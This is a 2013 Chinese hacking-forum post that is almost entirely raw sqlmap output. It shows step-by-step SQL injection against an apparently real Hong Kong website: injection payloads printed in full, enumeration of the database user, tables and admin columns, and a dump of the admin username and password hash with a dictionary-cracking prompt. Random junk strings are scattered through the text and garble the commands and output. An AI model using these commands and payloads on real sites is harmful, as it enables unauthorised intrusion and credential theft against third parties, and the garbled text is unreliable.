中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]

作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 [$ R, L5 Q/ g9 h8 b/ q
ms "Mysql" --current-user       /*  注解:获取当前用户名称
$ E+ i+ v7 X5 z6 p6 r) J    sqlmap/0.9 - automatic SQL injection and database takeover tool$ t3 ]. e3 S3 e( r1 `' [
    http://sqlmap.sourceforge.net
  • starting at: 16:53:549 `3 E; y4 [5 F+ z1 u
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: u8 Q' o! Q( c, J% n) ?/ P' k5 t% X4 u
    session file
    7 t2 {4 u4 I9 p; z" o$ d+ i[16:53:54] [INFO] resuming injection data from session file
    ) ?1 @; c( k4 R' _* @; U/ c[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file3 D6 d% x3 K$ d$ A4 ?
    [16:53:54] [INFO] testing connection to the target url
    / |  K% ~3 o& D4 D0 {3 ^, F8 Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque% ^8 K' m/ s, [$ Z5 D+ x. g1 R
    sts:
    - b5 a: r3 U1 x" T8 Z) w---8 a5 ]0 ^' a  X+ [
    Place: GET% z. c& n* J. _$ v( b
    Parameter: id
      C$ n5 V! \' i    Type: boolean-based blind
    2 d7 c* r8 X& Y    Title: AND boolean-based blind - WHERE or HAVING clause
    3 v5 n( r3 C+ h0 [# j    Payload: id=276 AND 799=799$ ?! X9 {+ c9 \
        Type: error-based  W" l8 v5 \2 ^: E0 N
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    / z9 n. d* g" w6 l    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# s# |( U& P$ B0 {; r. M
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    5 ?3 U2 m/ f/ ?- Y- m),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); C8 C; G& s9 ]5 M2 k
        Type: UNION query! D3 e) X. |* X# c0 Z, {- q7 g
        Title: MySQL UNION query (NULL) - 1 to 10 columns# y8 ?7 x; U. `# S, w
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    6 ?. U6 Q! ?  |(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    " H. M( l: E. T/ W' |CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    . R/ L$ {- r1 }3 ^    Type: AND/OR time-based blind
    , o, C2 H6 g& l    Title: MySQL > 5.0.11 AND time-based blind
    9 ~/ y+ E; L  q* i  l    Payload: id=276 AND SLEEP(5)$ w- v8 \5 k6 u$ j- d. V9 l% E* z
    ---- R) _: J: N& b& B; M9 a9 i
    [16:53:55] [INFO] the back-end DBMS is MySQL
    # m8 P3 v; v. l" e& y& X+ n' Pweb server operating system: Windows
    * s4 r, u0 N% J; \% Uweb application technology: Apache 2.2.11, PHP 5.3.0' g* l* I7 N' y- W% x: O
    back-end DBMS: MySQL 5.0
    3 V3 ]9 U/ Q8 ~# B* X6 B/ g[16:53:55] [INFO] fetching current user
    ! T6 n+ e$ H% W1 }current user:    'root@localhost'   
    2 j* `# A! R% e/ |  B% c9 y: ][16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    6 H; f" Q6 W# Y$ T  ~% B4 `9 S5 A0 stput\www.wepost.com.hk'
  • shutting down at: 16:53:583 h8 M8 q& x3 k( p1 l  |2 U9 M
    / N' Q. m" Q6 c% u8 ]
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
      l1 c1 y9 D* q0 t; ~, ~* Ums "Mysql" --current-db                  /*当前数据库! b1 W, k. K7 P) q2 `& v% c
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ) v: ~& s) m6 T) M' ]2 O0 H1 \    http://sqlmap.sourceforge.net
  • starting at: 16:54:169 F* H8 y# A/ V5 X
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ( c* R+ N/ M% Q) E7 g  D- P* { session file
    4 _2 k& q0 g5 }0 E: D" {" W, T1 I; F[16:54:16] [INFO] resuming injection data from session file, C) ~. V" V. `# V3 l
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    $ m* D. i# D% C4 s0 Q[16:54:16] [INFO] testing connection to the target url9 d4 h! D( w" V
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
      A/ c+ L; |; P, S2 vsts:
    - [; h, x  \; p, \---% a* u1 s; r! z5 x$ \
    Place: GET: [* q  O9 D+ t
    Parameter: id
    ; c8 I' x+ A/ n1 P- T/ v    Type: boolean-based blind
    1 t' J' L2 `) Q' ^    Title: AND boolean-based blind - WHERE or HAVING clause
    4 e) x! Z! w0 K$ d: V0 l( L    Payload: id=276 AND 799=799
    5 c2 P7 D, V. X  w. m    Type: error-based
    ; c; P  g4 I0 @    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      B; b; s2 V/ B; |! c% a: S    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; f2 {& D( D: m" T1 E$ i
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 T- O3 v" O$ e5 D
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# `! v  C% B+ N. p
        Type: UNION query
    5 w8 P. x' p) f# O9 W5 h- J, \/ w    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ) ~6 `7 S& _. z  S    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" Y; f9 V, i7 L2 x/ m) K* K
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( I; \( ]% ?9 k* V3 W+ u" Z7 s5 f
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    : i% d( Z4 v& l- |' Y, O' I    Type: AND/OR time-based blind' }. x9 y# g+ h
        Title: MySQL > 5.0.11 AND time-based blind
    / o# D8 j, x' R! s$ J- {! J    Payload: id=276 AND SLEEP(5)
      s% A$ R# p! h8 f---
    7 H! q; l2 s: `- V[16:54:17] [INFO] the back-end DBMS is MySQL8 @" H+ L- @$ X, S4 L& D  I4 [9 P0 V
    web server operating system: Windows0 X- n$ O  t% M( ^3 d1 l
    web application technology: Apache 2.2.11, PHP 5.3.0
    : D% }" {, r* D& H. ^! j& oback-end DBMS: MySQL 5.0' z+ y& E) G8 v% K% c' P
    [16:54:17] [INFO] fetching current database
    5 p7 ^0 ~0 h0 H4 W7 b( gcurrent database:    'wepost'
    # U9 P9 J0 \8 y  a8 I[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou( m# |5 P6 T% z
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    & I- O, X2 o' f. }" LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# W" C" I1 o$ ]
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名3 Z1 N6 \/ c; n1 r; A
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ( c! j- k8 c+ A* X    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    0 V+ g/ y+ o+ z/ r" K  M8 x8 j) I( o[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ! t% q5 X7 X* s# y session file" Q# D% B3 g( j: n
    [16:55:25] [INFO] resuming injection data from session file) R- c9 m+ \) M5 k/ l" j! U
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    % z0 P0 Y, a0 @$ [[16:55:25] [INFO] testing connection to the target url
    $ T: }% [# j' G; o; Y6 J- N/ Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque/ D) Z! q0 \$ ~. t% g8 @6 o
    sts:
    # I2 @1 r) H( b, N---
    " h4 @3 O3 k) o& vPlace: GET
    % o# e" t: B9 P* dParameter: id. }) H/ W! e6 u7 e# t- H
        Type: boolean-based blind) _+ Y* I; Z9 G6 `, x
        Title: AND boolean-based blind - WHERE or HAVING clause
    0 W. U. G* s9 o- l    Payload: id=276 AND 799=799
    2 S3 l0 ?$ J  Q" E1 w$ G3 I3 C    Type: error-based* A. A0 K5 k7 I; i2 E# z
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    2 n) u, o; Y$ t* F0 [    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,! w& [8 C+ T& \0 z2 c1 A9 S9 d
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ \7 l5 y  Q5 o+ M  S' K: B1 A
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    $ G+ [( {- W0 J; }  ^3 z    Type: UNION query
    , ]  C. Q# f+ P  P' q# T    Title: MySQL UNION query (NULL) - 1 to 10 columns
    * L! p/ E- V! Z* T$ E    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    . {. }% I2 Z# V! K- }+ x* {" D(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ y' G3 K1 F6 G
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    8 c3 S3 z. ^# ?* D; v1 t    Type: AND/OR time-based blind
    - X. Z9 k% f: y    Title: MySQL > 5.0.11 AND time-based blind4 R! y6 n  W  W# c; i2 l4 Z- x6 Z
        Payload: id=276 AND SLEEP(5)' \% v& F. G/ _! H8 l
    ---7 c% J5 j% h$ u. y1 r
    [16:55:26] [INFO] the back-end DBMS is MySQL
    4 |/ d4 F) `2 _$ _/ C  oweb server operating system: Windows
    ' @& f1 ~; m! j. h1 f" L3 k1 aweb application technology: Apache 2.2.11, PHP 5.3.0
    1 I! t1 P0 w$ K5 p9 Lback-end DBMS: MySQL 5.0
    2 u0 T. M! `; }6 r) Z3 k, t: }[16:55:26] [INFO] fetching tables for database 'wepost'. x- u& e) P% Q" r7 x
    [16:55:27] [INFO] the SQL query used returns 6 entries8 V+ n2 O4 o. ^2 w) c- {; T
    Database: wepost
    - x: P/ y1 X' T/ Z2 {[6 tables]
      a$ S: P( J. V: u( q1 ]+-------------+7 S2 c* |. _; H0 j
    | admin       |
    7 h- V4 H8 e$ {, [+ b| article     |
    ! u- p  H: u; Z! ?2 U+ \+ K| contributor |
    . M6 f$ T9 g+ G7 V2 e| idea        |" H0 O( R% g/ f1 F; V1 w) l
    | image       |
    8 U- k5 f4 V$ i| issue       |: r5 X9 s& R, X1 U2 ^" |$ Q" j0 g* `
    +-------------+
    : o1 ]5 z; \; N[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    1 q& ]9 c  Z  N4 h1 V6 n9 `tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    $ ~" o' E+ M5 s9 M1 v( ?* W/ Q) ^
    ' \, w. c$ y$ b% a3 x7 X8 ]D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" |9 M1 T2 a% M- ~
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名2 v, K( R) _4 A+ Y1 u; y
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ' O% O5 ]( \, {  l2 C) P    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    ( i6 x. G7 t6 i+ G. jsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    7 v) [2 i' ?4 Zsts:* B4 A1 B/ k$ w. o
    ---! c( W7 K. X" d; x9 u
    Place: GET! k5 s! {, Y: v8 M
    Parameter: id
    ( c: O" ~- ]9 ~8 A- }8 e8 \    Type: boolean-based blind
    6 W! g+ s7 u- i" X1 f    Title: AND boolean-based blind - WHERE or HAVING clause8 J, L( {# G8 U* K
        Payload: id=276 AND 799=799
    ; }! U4 P0 I& V0 P+ ?& J    Type: error-based
    ( `/ E7 ^4 h3 ~    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    - @8 z9 Q# J: e3 T6 V7 _    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: N6 U" t$ N* ~4 ^
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 Q! h" y3 g# }3 S5 e3 {
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    # l5 s9 u" v5 h0 B    Type: UNION query
    1 ^3 ]; w' B2 Y8 J) L4 c    Title: MySQL UNION query (NULL) - 1 to 10 columns# [* H/ T) H' t/ d# X1 D% h2 r
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# c! A/ s" S  E& s! n1 @2 i
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    & Y* j2 J( w8 J. M8 Z9 l: t6 ICHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    6 {2 C" u! I8 g/ D2 R: {    Type: AND/OR time-based blind( n/ U4 ]/ P" G: I, b7 W
        Title: MySQL > 5.0.11 AND time-based blind
    $ H# M- D5 F5 d8 [1 X# [    Payload: id=276 AND SLEEP(5)
    5 Q: f% ^. Y* o, N: c---$ K! x9 ^, q' r3 Y+ h
    web server operating system: Windows. j/ N, l2 \5 x5 S, d0 d
    web application technology: Apache 2.2.11, PHP 5.3.0
      l0 q5 a7 O7 ~* f# T6 w3 j  y2 ]: uback-end DBMS: MySQL 5.09 o0 M5 c; _" L! _- `5 N
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    & o& p* x+ o0 R9 V3 Xssion': wepost, wepost
    2 p3 ]4 K5 W# [' y( ~5 LDatabase: wepost! w5 \- a, }0 ^0 Y# l
    Table: admin
    $ x7 A% S7 a; T5 Z[4 columns]/ M6 [) }0 \% K1 d( }- g  J. }- X  e
    +----------+-------------+
    & N+ S4 G6 @8 f% N+ N4 }$ p| Column   | Type        |
    - w4 w4 e. U7 `4 z5 k3 c. S+----------+-------------+
    9 A' I  Q/ q) }5 w  ~  G| id       | int(11)     |) q4 f- O' j! S" [2 j  F+ [' h3 S
    | password | varchar(32) |8 T, m. [( V  @2 O! R! ?
    | type     | varchar(10) |
    ' [$ ^' V- ~2 a1 Y! d1 B3 w| userid   | varchar(20) |
    + v0 N0 g& o; c. n+----------+-------------+6 M/ x$ k% _; V5 C6 q$ j
  • shutting down at: 16:56:19, q( Y; E7 J8 _. ]% L% m6 C- p; k2 p
    $ P( N/ R  B  r5 a, G1 @2 H& C, h+ j
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ) x9 G/ g; F) M( X& ems "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容& _* L% i7 T; y% ]7 N! y
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    8 r* c3 v0 S  C5 `    http://sqlmap.sourceforge.net
  • starting at: 16:57:14: {( C& A& D6 h6 ]1 n
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    7 U2 U5 {% v; G( L- p' ests:
    7 n  Y4 _  w: Z---/ y" x/ D7 A' x$ F
    Place: GET0 s9 X1 _1 G$ k; ^8 \9 N9 F  u
    Parameter: id' o1 \- d% a1 W3 f" ]7 }) l+ ~# d- ?7 j
        Type: boolean-based blind
      ~3 ?; x" K/ Y    Title: AND boolean-based blind - WHERE or HAVING clause' K/ J- N: J- m! [7 o
        Payload: id=276 AND 799=799  Z! h! r2 U" ]' y- J1 F
        Type: error-based
    + j9 d$ c# k( [- M    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ A; I+ x3 G8 h, K& V; Y/ v" w
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    6 K+ A& J3 S; y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    5 P: t' E2 T; m, r8 t: C; T2 W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    8 ?1 g+ y% i/ L  b0 R9 H    Type: UNION query
    . t' w0 ~/ F: C$ z2 U    Title: MySQL UNION query (NULL) - 1 to 10 columns
    . `4 \$ [  x# J* F1 I) _    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 O3 ~  f, ?! F9 Z7 s
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 B1 }1 f; Z( ]* L7 d5 g
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- b+ p5 K1 c+ u/ A! M
        Type: AND/OR time-based blind
    + @* G, K% C1 Y3 _) j    Title: MySQL > 5.0.11 AND time-based blind% L" `" Q. Q4 P' b6 T
        Payload: id=276 AND SLEEP(5): y, h4 x1 q5 |' K; x4 L4 W
    ---/ N5 A4 B. X8 r2 y+ k( c
    web server operating system: Windows! U9 S0 s& y: s/ C3 A! a
    web application technology: Apache 2.2.11, PHP 5.3.0
    8 P: O. d+ L$ f/ B5 z! j) Eback-end DBMS: MySQL 5.0: r# m+ w( ]1 x) W
    recognized possible password hash values. do you want to use dictionary attack o9 U+ x4 C( q( u! c5 Y  X( e# _
    n retrieved table items? [Y/n/q] y
    ! T8 F# N! I. vwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]$ B; g0 K3 @& Q
    do you want to use common password suffixes? (slow!) [y/N] y
    0 g2 ~+ c$ ~! n+ b! `4 Y; ^Database: wepost; i! D2 E4 ?6 _8 V
    Table: admin
    ! E  C! l$ n0 X0 k* M2 M8 b[1 entry]
    " B. D5 h/ p5 a" \! J, o9 z+----------------------------------+------------+( {) h1 O3 a& |; F8 i% e
    | password                         | userid     |( g* o  V2 `) b* x2 X; X! m+ {9 R" }
    +----------------------------------+------------+7 @% V6 r1 n8 v0 W- j: Q$ C" ?
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    " C* |+ |3 B/ X+ u% D+----------------------------------+------------+. {) I5 t. h% u1 G; V3 s2 F6 D5 ?
  • shutting down at: 16:58:14; i, _( X4 d( U$ b5 f+ f0 g0 b
    : w; n& b& h6 b& t
    D:\Python27\sqlmap>




    欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2